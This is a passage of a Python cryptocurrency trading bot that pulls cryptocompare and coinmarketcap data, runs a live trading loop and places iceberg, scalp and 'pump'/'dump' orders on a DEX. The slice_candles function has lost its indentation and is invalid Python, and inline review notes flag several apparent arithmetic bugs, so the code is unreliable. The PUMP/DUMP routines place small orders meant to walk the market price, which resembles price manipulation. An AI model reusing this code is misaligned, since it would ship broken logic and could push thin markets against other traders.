                        book['bidp'][i] = min(
                            book['bidp'][i - 1] - DFLOAT,
                            book['bidp'][i])
                # print ((book['bidp'][:3])[::-1], 'BIDS <> ASKS',
                # book['askp'][:3],4)
    # NOTE(review): the final denominator reads bid + ask/2 - likely
    # meant (bid + ask)/2; harmless today since rrange only feeds the
    # commented-out log below - confirm before changing
    rrange = (sum(book['bidp']) + sum(book['askp'])) / (
        (len(book['bidp']) + len(book['askp']))) / (
        ((book['bidp'][0]) + (book['askp'][0]) / 2))
    # maintain a log of last price, relative range, and statistics type
    elapsed = '%.1f' % (time.time() - start)
    '''
    sbids = [('%.8f' % i) for i in book['bidp'][:3]]
    sbids = sbids[::-1]
    sasks = [('%.8f' % i) for i in book['askp'][:3]]
    print (sbids, 'BIDS <> ASKS', sasks)
    '''
    try:
        s = sum(tally.values())
        ptally = {k: ('%.2f' % (v / s)) for k, v in tally.items()}
        # print (tally)
        # print (clock(), ptally, 'elapsed: ', elapsed,
        #        'nodes: ', len(book_list), 'type: ',
        #        ('%.3f' % rrange), msg)
    except:
        pass
    # update communication file book.txt
    race_write('book.txt', text=book)
def book_loop():  # Run book process in loop
    """Daemon loop: refresh book.txt every 30 seconds, forever."""
    while True:
        try:
            book_process()
            time.sleep(30)
        except Exception as error:
            # no matter what happens just keep verifying book
            print(type(error).__name__, error.args, error)
def book_update():  # Run book process once
    """Block until book.txt has been written once."""
    refreshed = False
    try:
        # not satisfied until verified once
        while not refreshed:
            book_process()
            refreshed = True
    except Exception as error:
        print(type(error).__name__, error.args, error)
# CANDLES
def backtest_candles(pair, start, stop, candle):  # HLOCV arrays
    """Fetch the full backtest dataset as numpy HLOC arrays.

    Makes a single chartdata() call covering [start, stop], then clamps
    each candle's high to 2x close and low to 0.5x close to tame bad
    exchange data spikes.
    """
    rows = chartdata(pair, start, stop, candle)
    fields = (('unix', 'time'), ('high', 'high'), ('low', 'low'),
              ('open', 'open'), ('close', 'close'))
    d = {key: np.array([row[src] for row in rows]) for key, src in fields}
    # normalize high and low data against close
    for i in range(len(d['close'])):
        cap = 2 * d['close'][i]
        floor = 0.5 * d['close'][i]
        if d['high'][i] > cap:
            d['high'][i] = cap
        if d['low'][i] < floor:
            d['low'][i] = floor
    return d
def slice_candles(now, data): # Window backtest arrays
# window backtest_candles() data to test each candle
d = {}
for i in range(len(data['unix'])):
if now <= data['unix'][i] < (now + CANDLE):
h = []
l = []
o = []
c = []
for j in range(DEPTH):
try:
h.append(data['high'][i - j])
l.append(data['low'][i - j])
o.append(data['open'][i - j])
c.append(data['close'][i - j])
except:
print("append failed")
pass
# print close
d['high'] = np.array(h[::-1])
d['low'] = np.array(l[::-1])
d['open'] = np.array(o[::-1])
d['close'] = np.array(c[::-1])
return d
def live_candles(pair, candle, depth):  # Current HLOCV arrays
    """Fetch the most recent *depth* candles for *pair* as numpy arrays.

    Requests a little more history than needed (depth + 10 candles)
    and trims each series to the last *depth* entries.  Volume comes
    from cryptocompare's 'volumefrom' field.
    """
    now = int(time.time())
    rows = chartdata(pair, (now - (depth + 10) * candle), now, candle)
    fields = (('unix', 'time'), ('high', 'high'), ('low', 'low'),
              ('open', 'open'), ('close', 'close'),
              ('volume', 'volumefrom'))
    return {key: np.array([row[src] for row in rows][-depth:])
            for key, src in fields}
def chartdata(pair, start, stop, period):  # Public API cryptocompare
    """Fetch HLOCV candle rows for *pair* between unix *start* and *stop*.

    Returns a list of cryptocompare rows with zero-close (empty)
    candles removed, or None for an unsupported *period*.  For the 2h
    live candle a second, older page is fetched and prepended when the
    requested span exceeds ~1000 candles.
    """
    #{"time","close","high","low","open","volumefrom","volumeto"}
    # docs at https://www.cryptocompare.com/api/
    # print(('API call for chartdata %s %ss %se CANDLE %s DAYS %s' % (
    # pair, start, stop, period, int((stop - start) / 86400.0))))
    if period in [60, 300, 900, 1800, 3600, 7200, 14400, 43200, 86400]:
        uri = 'https://min-api.cryptocompare.com/data/'
        # choose endpoint and aggregation so candle size matches period
        if period <= 1800:
            uri += 'histominute'
            aggregate = period / 60.0
        if 3600 <= period <= 43200:
            uri += 'histohour'
            aggregate = period / 3600.0
        if period >= 86400:
            uri += 'histoday'
            aggregate = period / 86400.0
        aggregate = int(aggregate)
        # pair is formatted CURRENCY_ASSET, e.g. 'BTC_BTS'
        pair_split = pair.split('_')
        fsym = pair_split[1]
        tsym = pair_split[0]
        toTs = int(stop)
        limit = int((stop - start) / float(period))
        if limit > 2000:
            limit = 2000
        # NOTE(review): the computed `limit` above is never used; the
        # request always asks for the API maximum of 2000 rows -
        # confirm whether that is intentional before "fixing" it
        params = {'fsym': fsym, 'tsym': tsym, 'limit': 2000,
                  'aggregate': aggregate, 'toTs': toTs}
        ret = requests.get(uri, params=params).json()
        d = ret['Data']
        # drop empty candles (close == 0 means no trade data)
        clean_d = clean_d1 = [i for i in d if i['close'] > 0]
        # page back once for long 2h spans; one call covers ~2000 rows
        if (period == 7200) and ((stop - start) / 7200.0 > 1000):
            toTs -= period * len(clean_d)
            params = {'fsym': fsym, 'tsym': tsym, 'limit': 2000,
                      'aggregate': aggregate, 'toTs': toTs}
            ret = requests.get(uri, params=params).json()
            d = ret['Data']
            clean_d2 = [i for i in d if i['close'] > 0]
            clean_d = clean_d2 + clean_d1
            clean_d = [i for i in clean_d if i['time'] > start]
            print((len(clean_d),
                   (clean_d2[-1]['time'], clean_d1[0]['time']),
                   (clean_d1[0]['time'] - clean_d2[-1]['time'])))
            print()
        return clean_d
    else:
        print('invalid period')
        return None
def currencies():  # Public API cryptocompare
    """Fetch the full coin list from cryptocompare; return its Data map."""
    endpoint = 'https://min-api.cryptocompare.com/data/all/coinlist'
    response = requests.get(endpoint, params={}).json()
    coins = response['Data']
    print(('API currencies', len(coins), 'coins at cryptocompare'))
    return coins
def cryptocompare_time():  # CEX latency test
    """Return seconds since the freshest CEX exchange update, or -1 on error."""
    try:
        endpoint = 'https://www.cryptocompare.com/api/data/coinsnapshot'
        payload = {'fsym': ASSET, 'tsym': CURRENCY}
        snapshot = requests.get(endpoint, params=payload).json()
        stamps = [float(exchange['LASTUPDATE'])
                  for exchange in snapshot['Data']['Exchanges']]
        # freshest exchange timestamp wins
        latency = time.time() - max(stamps)
        print(('candle latency :', ('%.2f' % latency)))
        return latency
    except:
        return -1
def cryptocompare_last():  # CEX last price
    """Return (price, volume, latency) for ASSET/CURRENCY from cryptocompare."""
    endpoint = 'https://min-api.cryptocompare.com/data/pricemultifull'
    payload = {'fsyms': ASSET, 'tsyms': CURRENCY}
    full = requests.get(endpoint, params=payload).json()
    ticker = full['RAW'][ASSET][CURRENCY]
    price = float(ticker['PRICE'])
    volume = float(ticker['LASTVOLUME'])
    latency = time.time() - float(ticker['LASTUPDATE'])
    print(('cex_rate latency :', ('%.2f' % latency)))
    return price, volume, latency
def marketcap():  # Public API coinmarketcap
    """Return (asset_cap, asset_dominance, asset_rank) for ASSET.

    Cap figures are in millions of USD; dominance is the asset's
    percentage of the total market cap across all listings.
    """
    asset_cap = asset_dominance = asset_rank = 0
    print('API marketcap')
    endpoint = 'https://api.coinmarketcap.com/v1/ticker/'
    listings = requests.get(endpoint, params={'limit': 0}).json()
    asset_cap = 0
    total_cap = 0
    for coin in listings:
        usd = coin['market_cap_usd']
        cap = 0 if usd is None else float(usd) / 1000000.0
        if coin['symbol'] == ASSET:
            asset_cap = cap
            asset_rank = coin['rank']
        total_cap += cap
    asset_dominance = 100 * asset_cap / total_cap
    return asset_cap, asset_dominance, asset_rank
# LIVE
def live_initialize():  # Begin live session
    """Reset session state and plotting before the live event loop starts."""
    print(VERSION)
    print('~====== BEGIN LIVE SESSION =====================~')
    global storage
    global portfolio
    global info
    global data
    info = {}
    data = {}
    portfolio = {}
    if STORAGE_RESET:
        storage = {}
    # session counters persisted in storage
    storage['trades'] = 0
    storage['HFT'] = False
    storage['previous_v'] = SATOSHI
    # wall-clock bookkeeping for tick / hourly / daily events
    begin = int(time.time())
    info.update({'begin': begin,
                 'tick': 0,
                 'five_minute': 0,
                 'hour': 0,
                 'day': 0,
                 'current_time': begin,
                 'completion_time': begin - 60,
                 'end': None,
                 'live': True})
    live_chart_latest()
    plot_format()
def live():  # Primary live event loop
    """Run the live trading session forever.

    Each tick: fetch DEX/CEX data, recompute indicators and the state
    machine, place trades/scalps, and redraw the live plot.  Any step
    that raises restarts the tick from the top; ``attempt`` counts
    consecutive failures and ``msg`` accumulates the names of the
    failed steps so the alarm banner can report them.
    """
    global storage
    live_initialize()
    attempt = 0  # consecutive failed-step counter; reset after a clean tick
    msg = ''  # names of the steps that failed (feeds the alarm banner)
    while True:
        plt.pause(1)  # prevent inadvertent attack on API's
        info['current_time'] = now = int(time.time())
        print('')
        print(('______________________________%s_cex %s_dex %s' %
               (ASSET, BitASSET, time.ctime())))
        print('')
        # DEBUG LIVE SESSION
        # debug mode runs every step unguarded so exceptions surface raw
        debug = 0
        if debug:
            dex('blocktime')
            price, volume, latency = cryptocompare_last()
            storage['cc_last'] = {
                'price': price, 'volume': volume, 'latency': latency}
            cryptocompare_time()
            live_data()
            indicators()
            state_machine()
            hourly()
            daily()
            trade()
            scalp()
            live_chart()
            plot_format()
            live_plot()
            time.sleep(10)
        else:
            # RAISE ALARM
            # after three consecutive failures print (and optionally ring)
            if attempt > 2:
                time_msg = datetime.fromtimestamp(
                    now).strftime('%H:%M')
                print(
                    ('%s FAIL @@@@@@@ ATTEMPT: %s %s' %
                     (msg, attempt, time_msg)))
                if BELL:
                    bell(attempt, 432)
            # GATHER AND POST PROCESS DATA
            try:
                dex('blocktime')
            except:
                msg += 'dex(blocktime) '
                attempt += 1
                continue
            try:
                price, volume, latency = cryptocompare_last()
                storage['cc_last'] = {
                    'price': price, 'volume': volume, 'latency': latency}
            except:
                msg += 'cryptocompare_last() '
                attempt += 1
                continue
            try:
                cryptocompare_time()
            except:
                msg += 'cryptocompare_time() '
                attempt += 1
                continue
            print('')
            try:
                live_data()
            except:
                msg += 'live_data() '
                attempt += 1
                continue
            try:
                indicators()
            except:
                msg += 'indicators() '
                attempt += 1
                continue
            try:
                state_machine()
            except:
                msg += 'state_machine() '
                attempt += 1
                continue
            # LOWER FREQENCY EVENTS
            check_hour = (info['current_time'] - info['begin']) / 3600.0
            if check_hour > info['hour']:
                try:
                    hourly()
                    info['hour'] += 1
                except:
                    msg += 'hourly() '
                    attempt += 1
                    continue
            check_day = (info['current_time'] - info['begin']) / 86400.0
            if check_day > info['day']:
                try:
                    daily()
                    info['day'] += 1
                except:
                    msg += 'daily() '
                    attempt += 1
                    continue
            # TRADE
            try:
                trade()
            except:
                msg += 'trade() '
                attempt += 1
                continue
            # SCALP
            try:
                scalp()
            except:
                msg += 'scalp() '
                attempt += 1
                continue
            # PLOT
            try:
                live_chart()
            except:
                msg += 'live_chart() '
                attempt += 1
                continue
            try:
                plot_format()
            except:
                msg += 'plot_format() '
                attempt += 1
                continue
            try:
                live_plot()
            except:
                msg += 'live_plot() '
                attempt += 1
                continue
            # END PRIMARY TICK
            msg = ''
            info['tick'] += 1
            info['completion_time'] = int(time.time())
            attempt = 0
            # DELAY NEXT TICK
            # HFT mode paces to the TICK schedule; otherwise nap 5 minutes
            if not PUMP:
                if storage['HFT']:
                    print('HFT True')
                    set_timing()
                else:
                    plt.pause(300)
def set_timing():  # Limits HFT to 1 minute interval at end of minute
    """Throttle the event loop so ticks land once per TICK interval,
    then print how far the loop has drifted from its ideal schedule."""
    moment = time.time()
    ticks_due = math.floor((moment - info['begin']) / TICK)
    since_last = moment - info['completion_time']
    if (info['tick'] + 1) > ticks_due:
        # ahead of schedule: hold until the TICK_TIMING offset of the
        # current interval comes around
        pause_for = max(0, (TICK_TIMING - (time.time() % TICK)))
        print(('standard wait: %.2f' % pause_for))
        if pause_for > 0:
            plt.pause(pause_for)
    elif since_last < TICK_MINIMUM:
        # behind schedule, but still enforce a minimum tick spacing
        pause_for = TICK_MINIMUM - since_last
        print(('minimum wait: %.2f' % pause_for))
        if pause_for > 0:
            plt.pause(pause_for)
    else:
        print('skip set_timing(); no wait')
    # report schedule slippage in seconds and whole ticks
    lag = ((time.time() - info['begin']) - info['tick'] * TICK -
           TICK_TIMING + info['begin'] % TICK)
    lag_ticks = int(lag // TICK)
    print(('drift: %.6f drift minutes %s' % (lag, lag_ticks)))
def live_data():  # Gather live data from public and private api
    """Refresh candles, exchange rates, balances and derived portfolio
    metrics into the module-level dicts.

    Populates data['7200'] / data['300'] with candle series,
    storage['cex_rate'] / storage['dex_rate'], and the portfolio
    balances, bitcoin value and percent-invested figures.
    """
    global portfolio
    global data
    global storage
    # populate 2h candles, 5m candles, and market rate
    data['7200'] = live_candles(PAIR, candle=7200, depth=int(MA2 * 13))
    data['300'] = live_candles(PAIR, candle=300, depth=300)
    # CEX rate was cached by cryptocompare_last() earlier this tick
    cex_rate = storage['cex_rate'] = storage['cc_last']['price']
    dex_rate = storage['dex_rate'] = dex('last')
    print('')
    print(('cex_rate: ', ('%.8f' % cex_rate)))
    print(('dex_rate: ', ('%.8f' % dex_rate)))
    print(('delta : ', ('%.8f' % (cex_rate - dex_rate))))
    print('')
    # update portfolio assets and currency
    market_balances = dex('market_balances')
    portfolio['currency'] = market_balances['currency']
    portfolio['assets'] = market_balances['assets']
    # Check bitcoin value of account
    bts, btc, usd = dex('account_value')
    portfolio['btcValue'] = btc
    # derive value of assets held and percent invested
    portfolio['btcValue_asset'] = cex_rate * portfolio['assets']
    portfolio['percent_invested'] = portfolio['btcValue_asset'] / btc
    print(('%.2f Bitcoin Value Portfolio' % portfolio['btcValue']))
    print(('%.2f Bitcoin Value Asset' % portfolio['btcValue_asset']))
    print(('%.2f Percent Invested' % portfolio['percent_invested']))
def scalp():  # Initiate secondary order placement
    """Place the secondary (recycle / scalp / pump-dump) orders around
    the primary buy/sell thresholds, then print a status line.

    Order placement is gated by the RECYCLE / SCALP / PUMP switches;
    the 'penny' signal ('pump' or 'dump') chooses which side to work.
    """
    # localize data
    global storage
    now = int(time.time())
    ask_p = book['askp'][0]
    ask_v = book['askv'][0]
    bid_p = book['bidp'][0]
    bid_v = book['bidv'][0]
    ask_p2 = book['askp'][1]
    bid_p2 = book['bidp'][1]
    cex_rate = storage['cex_rate']
    dex_rate = storage['dex_rate']
    assets = portfolio['assets']
    buying = storage['buying']
    selling = storage['selling']
    high = storage['high']
    low = storage['low']
    asset_ratio = storage['asset_ratio']
    currency = portfolio['currency']
    means = storage['means']  # NOTE(review): read but unused below
    ma3 = storage['ma3'][-1]
    ma4 = storage['ma4'][-1]
    market_cross = storage['market_cross']
    asset_ratio = storage['asset_ratio']  # duplicate of the lookup above
    mid_market = storage['mid_market']
    min_order = 0.00011 / dex_rate  # NOTE(review): unused below
    max_currency = storage['max_currency']
    max_assets = storage['max_assets']
    # alpha pump/dump signal
    penny = None
    if cex_rate > mid_market:  # RUNNING TO TOP
        if asset_ratio > 0.10:  # if any assets
            penny = 'pump'
        if asset_ratio < 0.10:  # if not much assets
            penny = 'dump'
    if cex_rate < mid_market:  # IF FALLING TO SUPPORT
        if asset_ratio < 0.90:  # if any currency
            penny = 'dump'
        if asset_ratio > 0.90:  # if not much currency
            penny = 'pump'
    # random List integers for scalp placement
    x = [i for i in range(4)]
    shuffle(x)
    # define scalp support and resistance
    scalp_resistance = max(high, ma3, ma4)
    scalp_support = min(low, ma3, ma4)
    # limit scalp ops to buying/selling window
    max_scalp_support = ((1 - MIN_MARGIN) * selling)  # 97% of selling
    min_scalp_resistance = ((1 + MIN_MARGIN) * buying)  # 103% of buying
    scalp_support = min(scalp_support, max_scalp_support)
    scalp_resistance = max(scalp_resistance, min_scalp_resistance)
    # limit scalp ops to dex bid/ask
    scalp_resistance = max(scalp_resistance, bid_p)
    scalp_support = min(scalp_support, ask_p)
    # adjust scalp margins if too thin
    scalp_margin = (scalp_resistance - scalp_support) / scalp_support
    if scalp_margin < MIN_MARGIN:
        if penny == 'pump':
            scalp_resistance = (1 + MIN_MARGIN) * scalp_support
        if penny == 'dump':
            scalp_support = (1 - MIN_MARGIN) * scalp_resistance
        if penny is None:
            # NOTE(review): midscalp is the *sum* of the two bounds, not
            # their midpoint — confirm whether a /2 was intended here
            midscalp = (scalp_resistance + scalp_support)
            scalp_resistance = (1 + MIN_MARGIN / 2) * midscalp
            scalp_support = (1 - MIN_MARGIN / 2) * midscalp
    # store scalp thresholds globally
    storage['scalp_resistance'] = scalp_resistance
    storage['scalp_support'] = scalp_support
    if RECYCLE:
        if penny == 'pump':
            # recycle currency
            if asset_ratio > (1 - SCALP_FUND):
                qty = SCALP_FUND * max_currency * scalp_resistance
                qty -= currency * scalp_resistance
                print('RECYCLE CURRENCY')
                print(('price %.8f qty %s' % (scalp_resistance, qty)))
                try:
                    dex('sell', price=scalp_resistance, amount=qty)
                    plt.plot(
                        now, scalp_resistance,
                        markersize=2 * math.log10(qty),
                        marker='v', ls='', color='red',
                        label='RECYCLE')
                except:
                    pass
        if penny == 'dump':
            # recycle assets
            if asset_ratio < SCALP_FUND:
                qty = SCALP_FUND * max_currency * scalp_support
                qty -= assets
                print('RECYCLE ASSETS')
                print(('price %.8f qty %s' % (scalp_support, qty)))
                try:
                    dex('buy', price=scalp_support, amount=qty)
                    plt.plot(
                        now, scalp_support,
                        markersize=2 * math.log10(qty),
                        marker='^', ls='', color='lime',
                        label='RECYCLE')
                except:
                    pass
    if SCALP:
        # NOTE(review): the 'pump' and 'dump' branches below are
        # identical — confirm whether they were meant to differ
        if penny == 'pump':
            for i in x:
                # SCALP BUY
                scalp = scalp_support - i * SATOSHI
                qty = (0.0001 / scalp) * 10
                qty = (qty * (1 + random())) * (1 + i)
                try:
                    dex('buy', price=scalp, amount=qty)
                except:
                    pass
                # SCALP SELL
                scalp = scalp_resistance + i * SATOSHI
                qty = (0.0001 / scalp) * 10
                qty = (qty * (1 + random())) * (1 + i)
                try:
                    dex('sell', price=scalp, amount=qty)
                except:
                    pass
        if penny == 'dump':
            for i in x:
                # SCALP BUY
                scalp = scalp_support - i * SATOSHI
                qty = (0.0001 / scalp) * 10
                qty = (qty * (1 + random())) * (1 + i)
                try:
                    dex('buy', price=scalp, amount=qty)
                except:
                    pass
                # SCALP SELL
                scalp = scalp_resistance + i * SATOSHI
                qty = (0.0001 / scalp) * 10
                qty = (qty * (1 + random())) * (1 + i)
                try:
                    dex('sell', price=scalp, amount=qty)
                except:
                    pass
    if PUMP:
        if penny == 'pump':
            set_timing()
            # clear spam pump
            if ask_v < 5 * (0.00011 / cex_rate):
                qty1 = (ask_v)  # spam size
                qty2 = (0.00011 / cex_rate)  # min order
                qty = max(qty1, qty2)
                print('PUMP 1 - CLEAR SPAM')
                print(('pump %.8f qty %.8f' % (ask_p2, qty)))
                try:
                    dex('buy', price=ask_p2, amount=qty)
                    dex('buy', price=(ask_p - SATOSHI), amount=qty2)
                    plt.plot(now, ask_p, markersize=5 * math.log10(qty),
                             marker='^', ls='', color='lime', label='SPAM')
                except:
                    pass
            # walk forward pump
            elif (ask_p > cex_rate) or (storage['recycle_trigger']):
                qty = (0.00011 / cex_rate)
                print('PUMP 2 - WALK FORWARD')
                print(('pump %.8f qty %.8f' % (ask_p, qty)))
                try:
                    dex('buy', price=ask_p2, amount=qty)
                    dex('buy', price=(ask_p - SATOSHI), amount=qty)
                    plt.plot(now, ask_p, markersize=5 * math.log10(qty),
                             marker='^', ls='', color='lime', label='WALK')
                except:
                    pass
            # close gap pump
            elif (ask_p - bid_p > 3 * SATOSHI):
                qty = (0.00011 / cex_rate)
                r = (ask_p - SATOSHI)
                print('PUMP 3 - CLOSE GAP')
                print(('pump %.8f qty %.8f' % (r, qty)))
                try:
                    dex('buy', price=r, amount=qty)
                    plt.plot(now, r, markersize=5 * math.log10(qty),
                             marker='^', ls='', color='lime', label='WALK')
                except:
                    pass
        if penny == 'dump':
            set_timing()
            # clear spam dump
            if bid_v < 0.350:
                qty1 = bid_v  # spam size
                qty2 = (0.00011 / bid_p)  # min order
                qty = max(qty1, qty2)
                print('DUMP 1 - CLEAR SPAM')
                print(('dump %.8f qty %s' % (bid_p2, qty)))
                try:
                    dex('sell', price=bid_p2, amount=qty)
                    plt.plot(now, bid_p2, markersize=5 * math.log10(qty),
                             marker='v', ls='', color='red', label='SPAM')
                except:
                    pass
            # walk forward dump
            elif (bid_p < cex_rate) or (storage['recycle_trigger']):
                qty = (0.00011 / bid_p)
                print('DUMP 2 - WALK FORWARD')
                print(('dump %.8f qty %s' % (bid_p, qty)))
                try:
                    dex('sell', price=bid_p2, amount=qty)
                    plt.plot(now, bid_p, markersize=5 * math.log10(qty),
                             marker='v', ls='', color='red', label='WALK')
                except:
                    pass
            # close gap dump
            elif (ask_p - bid_p > 3 * SATOSHI):
                qty = (0.00011 / cex_rate)
                r = (bid_p + SATOSHI)
                print('DUMP 3 - CLOSE GAP')
                print(('dump %.8f qty %.8f' % (r, qty)))
                try:
                    dex('sell', price=r, amount=qty)
                    plt.plot(now, r, markersize=5 * math.log10(qty),
                             marker='^', ls='', color='lime', label='WALK')
                except:
                    pass
    # Print trade pair and time
    time_LOCAL = datetime.fromtimestamp(
        int(time.time())).strftime('%H:%M:%S')
    # NOTE(review): the +18000s offset assumes local time is UTC-5 —
    # confirm; this breaks on other host timezones
    time_UTC = datetime.fromtimestamp(
        int(time.time()) + 18000).strftime('%H:%M:%S')
    print(('%.2f %s %.2f %s' % (currency, CURRENCY, assets, ASSET)))
    print(('%s UTC %s' %
           (time_UTC, time_LOCAL)))
    print(('(buying: %.8f selling %.8f) (scalp buy %.8f, scalp sell %.8f)' %
           (buying, selling, scalp_support, scalp_resistance)))
def trade():  # Initiate primary order placement
    """Place (live) or simulate (backtest) the primary buy/sell orders.

    Live: cancels open orders, then lays iceberg sells near ``selling``
    and iceberg buys near ``buying`` subject to the MAX_ASSETS /
    MAX_CURRENCY exposure limits.  Backtest: routes threshold touches
    to test_buy() / test_sell().
    """
    global storage
    # localize data
    buying = storage['buying']
    selling = storage['selling']
    mid_market = storage['mid_market']
    market_cross = storage['market_cross']
    buying_r = buying
    selling_r = selling
    if info['live']:  # localize additional data for live session
        storage['recycle_trigger'] = False
        ask_p = book['askp'][0]
        bid_p = book['bidp'][0]
        dex_rate = storage['dex_rate']
        cex_rate = storage['cex_rate']
        assets = portfolio['assets']
        asset_ratio = storage['asset_ratio']
        means = storage['means']  # NOTE(review): read but unused below
        invested = portfolio['percent_invested']
        divested = 100 - invested
        min_order = 0.00011 / dex_rate  # NOTE(review): unused below
        dex('cancel')
        max_assets = (MAX_ASSETS / 100.0) * portfolio['btcValue'] / dex_rate
        max_currency = (MAX_CURRENCY / 100.0) * portfolio['btcValue']
        print(('assets %.1f, max assets %.1f' % (assets, max_assets)))
        pieces = 10.0  # order size
        if MANUAL_OVERRIDE:
            storage['selling'] = selling = MANUAL_SELL
            storage['buying'] = buying = MANUAL_BUY
        # HFT defaults off each tick; any secondary mode re-enables it
        storage['HFT'] = False
        if SCALP or DUMP or PUMP or RECYCLE:
            storage['HFT'] = True
        qty = max_assets / pieces
        if (dex_rate > 0.90 * selling):
            print('APPROACHING SELL POINT')
            if BELL:
                bell(0.5, 800)
            if (portfolio['assets'] > 0.1):
                if (divested < MAX_CURRENCY):
                    storage['HFT'] = True
                    # sell no cheaper than the selling threshold
                    selling_r = max(selling, (dex_rate + ask_p) / 2)
                    try:
                        # iceberg
                        dex('sell', price=selling_r, amount=qty)
                        print(
                            ('SELLING', PAIR, 'RATE', ('%.8f' %
                             selling_r), 'AMOUNT', ('%.1f' %
                             qty)))
                        # liquidate
                        if portfolio['assets'] < qty:
                            qty = (portfolio['assets'] - SATOSHI)
                            # iceberg
                            dex('sell', price=selling_r, amount=qty)
                            print(
                                ('SELLING', PAIR, 'RATE', ('%.8f' %
                                 selling_r), 'AMOUNT', ('%.1f' %
                                 qty)))
                        # iceberg front limit
                        selling_r *= 0.985
                        qty /= 92.0
                        if random() > 0.5:
                            dex('sell', price=selling_r, amount=qty)
                            print(
                                ('SELLING', PAIR, 'RATE', ('%.8f' %
                                 selling_r), 'AMOUNT', ('%.1f' %
                                 qty)))
                    except:
                        print('SELL FAILED')
                        pass
                else:
                    print('MAX DIVESTED')
            else:
                print('NO ASSETS')
        # NOTE(review): buy qty is denominated like the sell side
        # (max_assets / pieces) — confirm this is intended
        qty = max_assets / pieces
        if dex_rate < 1.20 * buying:
            print('APPROACHING BUY POINT')
            if BELL:
                bell(0.5, 800)
            if (portfolio['currency'] > 0.1):
                if (invested < MAX_ASSETS):
                    storage['HFT'] = True
                    # buy no dearer than the buying threshold
                    buying_r = min(buying, (dex_rate + bid_p) / 2)
                    try:
                        dex('buy', price=buying_r, amount=qty)
                        print(
                            ('BUYING', PAIR, 'RATE', ('%.8f' %
                             buying_r), 'AMOUNT', ('%.1f' %
                             qty)))
                        buying_r *= 1.015
                        qty /= 92.0
                        if random() > 0.5:
                            dex('buy', price=buying_r, amount=qty)
                            print(
                                ('BUYING', PAIR, 'RATE', ('%.8f' %
                                 buying_r), 'AMOUNT', ('%.1f' %
                                 qty)))
                    except:
                        print('buy FAIL')
                        pass
                else:
                    print('MAX INVESTED')
            else:
                print ('NO CURRENCY')
    else:
        # test trade
        if portfolio['currency'] > 0:
            if (storage['low'][-1] < buying):
                buying_r = min(storage['high'][-1], buying)
                test_buy(buying_r)
        elif portfolio['assets'] > 0:
            if storage['high'][-1] > selling:
                selling_r = max(storage['low'][-1], selling)
                test_sell(selling_r)
def hourly():  # Do this every hour
    """Stamp a small hourly dot at the current CEX rate on the chart."""
    stamp = int(time.time())
    rate = storage['cex_rate']
    print(('hour: %s' % info['hour']))
    # label 'daily' kept for legend-grouping parity with daily()
    plt.plot(stamp, rate, markersize=5, marker='.',
             color='white', label='daily')
def daily():  # Do this every day
    """Stamp a larger daily dot at the current CEX rate on the chart."""
    stamp = int(time.time())
    rate = storage['cex_rate']
    print(('day: %s' % info['day']))
    plt.plot(stamp, rate, markersize=10, marker='.',
             color='white', label='daily')
# BACKTEST
def initialize():  # Open plot, set backtest days
    """Print the session banner, size the backtest window (DAYS), and
    open the interactive plot when charting is enabled."""
    global DAYS
    banners = {
        0: '~=== OPTIMIZING ======================~',
        1: '~=== BEGIN BACKTEST ==================~',
        2: '~=== WARMING UP PAPER SESSION ========~',
        3: '~=== WARMING UP LIVE MACHINE =========~',
        4: '~=== BEGIN SALES BACKTEST ============~',
    }
    if MODE in banners:
        print(banners[MODE])
    if LIVE:
        DAYS = 90
    else:
        DAYS = len(chartdata(PAIR, 1390000000, int(time.time()), 86400))
        # trim known glitches in the historical datasets
        if ASSET == 'BTS':  # filter glitch in dataset
            DAYS -= 250
            if CURRENCY == 'BITCNY':
                DAYS -= 200
        elif ASSET == 'DASH':  # filter glitch in dataset
            DAYS -= 360
        elif ASSET == 'NXT':  # filter glitch in dataset
            DAYS -= 300
        else:
            DAYS -= 100
        if (SALES or OPTIMIZE) and (DAYS >= 365):
            DAYS = 365
    if LIVE or BACKTEST:
        plt.ion()
        fig = plt.figure()
        fig.patch.set_facecolor('0.15')
def holdings():  # Calculate starting portfolio
    """Track the all-in asset/currency equivalents of the portfolio and,
    on the first tick, record the session baseline for ROI reporting."""
    first_tick = info['tick'] == 0
    last_close = (data['close'][-DAYS] if first_tick
                  else storage['close'][-1])
    # value of everything expressed all-in-assets and all-in-currency
    storage['max_assets'] = (portfolio['assets'] +
                             (portfolio['currency'] / last_close))
    storage['max_currency'] = (portfolio['currency'] +
                               (portfolio['assets'] * last_close))
    if first_tick:
        storage['begin_max_assets'] = storage['max_assets']
        storage['begin_max_currency'] = storage['max_currency']
        storage['start_price'] = last_close
def test_initialize():  # Begin backtest session
    """Seed storage/portfolio/info for a backtest run and fetch the
    complete candle dataset for the configured window."""
    now = int(time.time())
    global storage
    global portfolio
    global info
    global data
    # initialize storage
    storage['trades'] = 0
    storage['buys'] = [[], []]  # parallel [times, prices] of executed buys
    storage['sells'] = [[], []]  # parallel [times, prices] of executed sells
    # initialize portfolio balances
    portfolio['assets'] = float(START_ASSETS)
    portfolio['currency'] = float(START_CURRENCY)
    # initialize info dictionary objects
    info['begin'] = now - DAYS * 86400
    info['end'] = now
    info['tick'] = 0
    info['current_time'] = info['begin']
    # origin pads the window so moving averages have warm-up data
    info['origin'] = info['begin'] - int(1.1 * MA2 * 86400)
    info['live'] = False
    print(('Dataset.....: %s DAYS' %
           int((now - info['origin']) / 86400.0)))
    print(('Backtesting.: %s DAYS' %
           int((now - info['begin']) / 86400.0)))
    # check for compatible interval
    if CANDLE not in [300, 900, 1800, 7200, 14400, 86400]:
        print(('Tick Interval must be in [300, 900,' +
               '1800, 7200, 14400, 86400]'))
        # NOTE(review): `stop` is defined elsewhere in the file; assumed
        # to be an exception type or factory — confirm
        raise stop()
    # gather complete data set for backtest
    if LIVE or BACKTEST:
        # print(((now - info['origin']) / float(CANDLE)))
        data = backtest_candles(PAIR, info['origin'], now, CANDLE)
    # print(CANDLE)
    # print((len(data['unix']), (data['unix'][1] - data['unix'][0])))
    # print((min(data['unix']), time.ctime(min(data['unix'])), 'mindate'))
    # print((info['origin'], time.ctime(info['origin']), 'origin'))
    print('')
    print(('PAIR......: %s' % PAIR))
    print(('BitPAIR...: %s' % BitPAIR))
    print('')
    print(('CANDLE....: %s' % CANDLE))
    # print(('ORIGIN....: %s %s' % (info['origin'],
    #                               time.ctime(info['origin']))))
    # print(('BEGIN.....: %s %s' % (info['begin'],
    #                               time.ctime(info['begin']))))
    plot_format()
    if LIVE:
        test_chart_latest()
def backtest():  # Primary backtest event loop; the cost function
    #===================================================================
    '''BACKTEST EVENT LOOP.

    Step info['current_time'] forward one CANDLE at a time: slice the
    candle data, refresh holdings/indicators/state machine, and trade.
